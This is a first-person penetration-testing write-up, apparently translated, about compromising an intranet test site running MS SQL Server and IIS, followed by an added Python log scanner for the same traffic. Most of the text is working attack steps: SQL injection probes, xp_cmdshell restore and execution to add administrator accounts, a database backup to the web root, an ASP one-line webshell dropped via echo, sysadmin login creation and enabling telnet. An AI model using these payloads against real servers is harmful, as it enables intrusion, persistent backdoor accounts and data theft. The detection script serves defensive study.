When I first came into contact with security testing I had no systematic notion of it. My seniors had an intranet test website and asked me to get a shell on it, and that is how I started working on the platform.
First of all, penetration testing needs a plan; you cannot just hammer away blindly. So I approached the problem along the following lines:
Idea 1: Determine whether there is a SQL injection point and, from it, identify the database type. If it is MS SQL Server, check whether the xp_cmdshell extended stored procedure is disabled. If it is not, the injection point can call xp_cmdshell directly to add a system account.
Idea 2: Determine whether an upload vulnerability exists. This mainly means uploading a one-line script (an ASP "one-sentence" shell), getting a webshell first, and then using the webshell to get a system shell.
Idea 3: Work mainly through the sa login; roughly the same as the first method.
The implementation of these ideas is as follows.
Idea 1:
Since the question is whether SQL injection exists, the most convenient approach is to scan with a tool. Here I used WebCruiser, a very small tool; of course I was able to scan out the SQL injection vulnerability with it, and I could keep using it to obtain database information. Here I went straight to checking whether xp_cmdshell could be executed at this injection point.
The specific method is as follows:
Determine the database type:
?Id=1234 and (select count(*) from sysobjects)>0
The sysobjects table exists in SQL Server, so the page renders normally; an Access back end returns an error instead.
Obtain the current login name and the database name, to check whether the connection is sa:
?Id=1234 and user>0
The integer conversion fails and the error message discloses the user name; if it shows dbo, the web application connects as the database owner, which in practice means sa.
?Id=1234 and db_name()>0
The same conversion error discloses the name of the currently connected database.
Check whether xp_cmdshell is registered:
?Id=1234 and (select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')>0
xtype='X' selects extended stored procedures. Note that this only shows the procedure is registered: on SQL Server 2005 and later xp_cmdshell is present but disabled by default and controlled through sp_configure 'xp_cmdshell', so it can appear in sysobjects and still refuse to run.
If the stored procedure has been dropped, try to restore it:
?Id=1234;exec master..sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
If one of the following errors appears, try the corresponding fix:
Unable to load DLL xpsql70.dll or one of the DLLs it references. Reason 126 (the specified module could not be found): first run exec sp_dropextendedproc 'xp_cmdshell', then exec sp_addextendedproc 'xp_cmdshell','xpsql70.dll'.
Cannot find the function xp_cmdshell in xpweb70.dll. Reason 127: first run exec sp_dropextendedproc 'xp_cmdshell', then exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'.
A caveat: on SQL Server 2000 xp_cmdshell is exported by xplog70.dll, so the two retries above tend to reproduce the 127 error; dropping the registration and re-adding it against xplog70.dll is what normally works. On SQL Server 2005 and later the procedure is not dropped but disabled, and the equivalent is exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure, which itself requires sysadmin rights on the connection.
Use the stored procedure to add a user:
?Id=1234;exec master..xp_cmdshell 'net user aaa bbb /add'--
Here aaa is the user name and bbb the password; the trailing -- comments out the remainder of the original query.
Add it to the Administrators group:
?Id=1234;exec master..xp_cmdshell 'net localgroup administrators aaa /add'--
If you want to back up the database into the web root so that it can be downloaded:
?Id=1234;backup database <name> to disk='C:\inetpub\wwwroot\save.db'--
The premise, of course, is that you know the web virtual path (and that the SQL Server service account can write there).
When you know the web virtual path you can also recreate the conditions of the old IIS Unicode vulnerability by copying cmd.exe into the executable scripts directory, where it can then be invoked through the web server:
?Id=1234;exec master..xp_cmdshell 'copy c:\windows\system32\cmd.exe c:\inetpub\scripts\cmd.exe'--
The above relies mainly on xp_cmdshell. If that route does not work, it is another story.
Idea 2:
Since this is about uploading a file, the first task is to find the various upload paths. After half a day of exploring the front end I did not find any upload function, so I turned to the back-end upload function. Looking through all sorts of back-end information I found the admin back end, but helplessly the user name and password could not be verified: there was no corresponding user name or password in the database, so this back end was basically a dead one and nothing could be done with it. As you can see, the upload route became a dead end. At this point I used WebCruiser to scan the entire website; the thinking was that the tool has a cmd mode and can execute commands successfully. Since neither the front end nor the back end of the application allowed uploads, why not use the cmd command directly to create an ASP file? The premise is knowing where the web virtual path is.
Generally the web virtual path is something like C:\inetpub\wwwroot, D:\inetpub\wwwroot or E:\inetpub\wwwroot, and the executable virtual directory is generally C:\inetpub\scripts, D:\inetpub\scripts or E:\inetpub\scripts.
Next, run the following from the cmd command line:
echo ^<^%execute^(request^("eval"^)^)^%^> > c:\inetpub\wwwroot\cms\test123456.asp
The carets make cmd.exe write <, %, ( ) and > literally instead of interpreting them; the final unescaped > is the redirection that creates the file. This drops a one-line ASP Trojan, <%execute(request("eval"))%>, into that directory; connect to it with China Chopper (the "kitchen knife" client) and the webshell is obtained.
A webshell is not the most important thing, and a webshell does not have much functionality. So I tried to use the webshell to send my attack files to the corresponding directory; I tried several directories and found none that allowed execution. When I was about to give up I tried the directory C:\recycle and found that I could upload executable files there, after which the rest was simple.
The next step was to upload a tool and run the operation to add a system account. In doing so I still ran into many difficulties. For example, the Swiss army knife (netcat) I uploaded first was meant to add the user over a reverse-connect port, and that operation could not succeed.
Fortunately the 0-day overflow tool was powerful enough, and its backdoor could execute "C:\windows\system32\cmd.exe" "net user 111 111 /add", which successfully added a user. Haha, and of course if you want to add the user to the Administrators group, "C:\windows\system32\cmd.exe" "net localgroup administrators 111 /add" basically does it. At this point a simple penetration test that obtains system privileges is complete.
Actually, the cmd command in WebCruiser could have been used to add the user directly, saving all the subsequent steps. I only thought of that later, alas...
Idea 3:
Since xp_cmdshell can be executed, the injection point runs with sa-level rights, so we can try the sa route: first create a login in the database, then promote it to sysadmin and connect with Query Analyzer; from there you still rely on the xp_cmdshell stored procedure.
The specific method is as follows:
First, create a database login:
?Id=1234;exec master.dbo.sp_addlogin 'user'--
You can also give this login a password; it does not really matter. If you do, run:
?Id=1234;exec master.dbo.sp_password null,'password','user'--
Here null is the old password and password the new one.
Then grant the login the sysadmin server role:
?Id=1234;exec master.dbo.sp_addsrvrolemember 'user','sysadmin'--
(sp_addlogin and sp_password are the SQL Server 2000 procedures; on later versions CREATE LOGIN does the same job, and sp_addsrvrolemember, although deprecated, still works.)
After the promotion succeeds you can connect with Query Analyzer. Once connected, check directly whether xp_cmdshell is usable; if it is, proceed with the privilege operations, for example:
xp_cmdshell 'net user'
xp_cmdshell 'net user test123 test123 /add'
xp_cmdshell 'net localgroup administrators test123 /add'
xp_cmdshell 'net user test123 /del'
Enable the telnet service:
xp_cmdshell 'net start tlntsvr'
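The three ideas above leave a very recognisable trail in the web server logs: a sysobjects fingerprint, user>0 and db_name()>0 conversion errors, a lookup of xp_cmdshell in master.dbo.sysobjects, then stacked exec statements. As an added example (not part of the original write-up and not WebCruiser's code), the following scanner runs those patterns over constructed IIS W3C log lines covering Idea 1 (fingerprint, disclosure, xp_cmdshell and net user), Idea 2 (the echo that writes the ASP one-liner) and Idea 3 (sp_addsrvrolemember). The rule names, the #Fields layout, the date, client addresses and URIs are all made up for the example.

```python
"""
Added example (not part of the original write-up): detect the MSSQL injection
primitives used in Ideas 1-3 above by scanning IIS W3C log lines. Rule names,
the field layout and the log lines themselves are constructed for this
example, not taken from the original page or a real system.
"""
import re
from urllib.parse import unquote_plus

# Each rule is applied to the URL-decoded, lower-cased, whitespace-collapsed
# query string. Order only affects the order in which matched names are listed.
RULES = [
    ("mssql-fingerprint", re.compile(r"\bfrom\s+(master\.\.|master\.dbo\.)?sysobjects\b")),
    ("login-disclosure", re.compile(r"\b(user|db_name\(\))\s*>\s*0")),
    ("xp_cmdshell-lookup", re.compile(r"name\s*=\s*'xp_cmdshell'")),
    ("xp_cmdshell-exec", re.compile(r"\bexec\s+(master\.\.|master\.dbo\.)?xp_cmdshell\b")),
    ("xp-restore", re.compile(r"\bsp_(add|drop)extendedproc\b")),
    ("login-creation", re.compile(r"\bsp_(addlogin|password)\b")),
    ("sysadmin-escalation", re.compile(r"\bsp_addsrvrolemember\b.*\bsysadmin\b")),
    ("os-account-add", re.compile(r"\bnet\s+(user|localgroup)\b.*/add")),
    ("webshell-drop", re.compile(r"\becho\b.*\.asp\b")),
    ("db-dump-to-webroot", re.compile(r"\bbackup\s+database\b.*\bto\s+disk\b")),
]

# Fingerprinting, error-based disclosure and the existence check are
# reconnaissance; every other rule executes commands or changes server state.
PROBE_RULES = {"mssql-fingerprint", "login-disclosure", "xp_cmdshell-lookup"}

# Constructed IIS 6 W3C log excerpt (date, addresses and URIs are made up).
# It walks the Idea 1 sequence, then the Idea 3 escalation and the Idea 2 echo.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2013-05-20 10:01:02 10.0.0.5 GET /news.asp id=1234 200
2013-05-20 10:01:09 10.0.0.5 GET /news.asp id=1234+and+(select+count(*)+from+sysobjects)%3E0 200
2013-05-20 10:01:15 10.0.0.5 GET /news.asp id=1234+and+user%3E0 500
2013-05-20 10:01:21 10.0.0.5 GET /news.asp id=1234+and+db_name()%3E0 500
2013-05-20 10:01:30 10.0.0.5 GET /news.asp id=1234+and+(select+count(*)+from+master.dbo.sysobjects+where+xtype%3D'X'+and+name%3D'xp_cmdshell')%3E0 200
2013-05-20 10:01:44 10.0.0.5 GET /news.asp id=1234;exec+master..xp_cmdshell+'net+user+aaa+bbb+/add'-- 200
2013-05-20 10:01:50 10.0.0.5 GET /news.asp id=1234;exec+master..xp_cmdshell+'net+localgroup+administrators+aaa+/add'-- 200
2013-05-20 10:02:05 10.0.0.5 GET /news.asp id=1234;exec+master.dbo.sp_addsrvrolemember+'user','sysadmin'-- 200
2013-05-20 10:02:20 10.0.0.5 GET /news.asp id=1234;exec+master..xp_cmdshell+'echo+^<^%25execute(request("eval"))^%25^>+>+c:\\inetpub\\wwwroot\\cms\\test123456.asp'-- 200
2013-05-20 10:03:00 10.0.0.9 GET /news.asp id=55 200
"""


def parse_w3c(text):
    """Yield one dict per data line, using the #Fields header for the layout.
    Lines whose field count does not match the header are skipped, not guessed."""
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
        elif raw and not raw.startswith("#") and fields:
            parts = raw.split(" ")
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))


def normalize_query(query):
    """Decode %XX and '+' once, lower-case and collapse whitespace so the rules
    need not care about casing or encoding (xp_CmdShell, %20, +)."""
    return re.sub(r"\s+", " ", unquote_plus(query)).lower()


def classify(query):
    """Names of every rule that matches the query, in RULES order."""
    normalized = normalize_query(query)
    return [name for name, pattern in RULES if pattern.search(normalized)]


def stage(rule_names):
    """'exploit' if any matched rule runs commands or alters the server,
    'probe' for pure reconnaissance, 'clean' when nothing matched."""
    if not rule_names:
        return "clean"
    return "probe" if set(rule_names) <= PROBE_RULES else "exploit"


def scan(text):
    """Run every logged request through the rules; return only flagged ones."""
    hits = []
    for rec in parse_w3c(text):
        names = classify(rec.get("cs-uri-query", "-"))
        if names:
            hits.append({"ip": rec["c-ip"], "stem": rec["cs-uri-stem"],
                         "status": rec["sc-status"], "rules": names,
                         "stage": stage(names)})
    return hits


def chains_by_source(hits):
    """Distinct rules triggered per client address. One address that covers
    fingerprint -> disclosure -> xp_cmdshell is the Idea 1 procedure being
    worked end to end, which matters far more than a single stray hit."""
    chains = {}
    for hit in hits:
        chains.setdefault(hit["ip"], set()).update(hit["rules"])
    return {ip: sorted(names) for ip, names in chains.items()}


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["stem"], hit["status"], hit["stage"], ", ".join(hit["rules"]))
    print(chains_by_source(scan(SAMPLE_LOG)))
```

The rules are deliberately literal, so they catch exactly the traffic this write-up generates and nothing cleverer: comment or whitespace splitting (xp_cm/**/dshell), strings assembled with CHAR(), double URL encoding and POST bodies (which W3C logs do not record) all slip past them. The more robust signal in the sample is the pair of 500 responses on the same parameter from the same address, which is what error-based probing of user>0 and db_name()>0 looks like from the server side.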
Summary:
During this period I learned that a webshell and a shell are not the same thing, that xp_cmdshell can be used to obtain system privileges, and that some tools can execute cmd commands. I also gained a preliminary understanding of a series of attack tools such as the Swiss army knife (netcat) and Churrasco ("Brazilian barbecue"), and of course learned that some systems can be hit with 0-days. Although there is still much I do not know about this penetration and I only have a rough understanding of it, I should now have a decent idea and a reference for the future. Security is a long road; encourage yourself.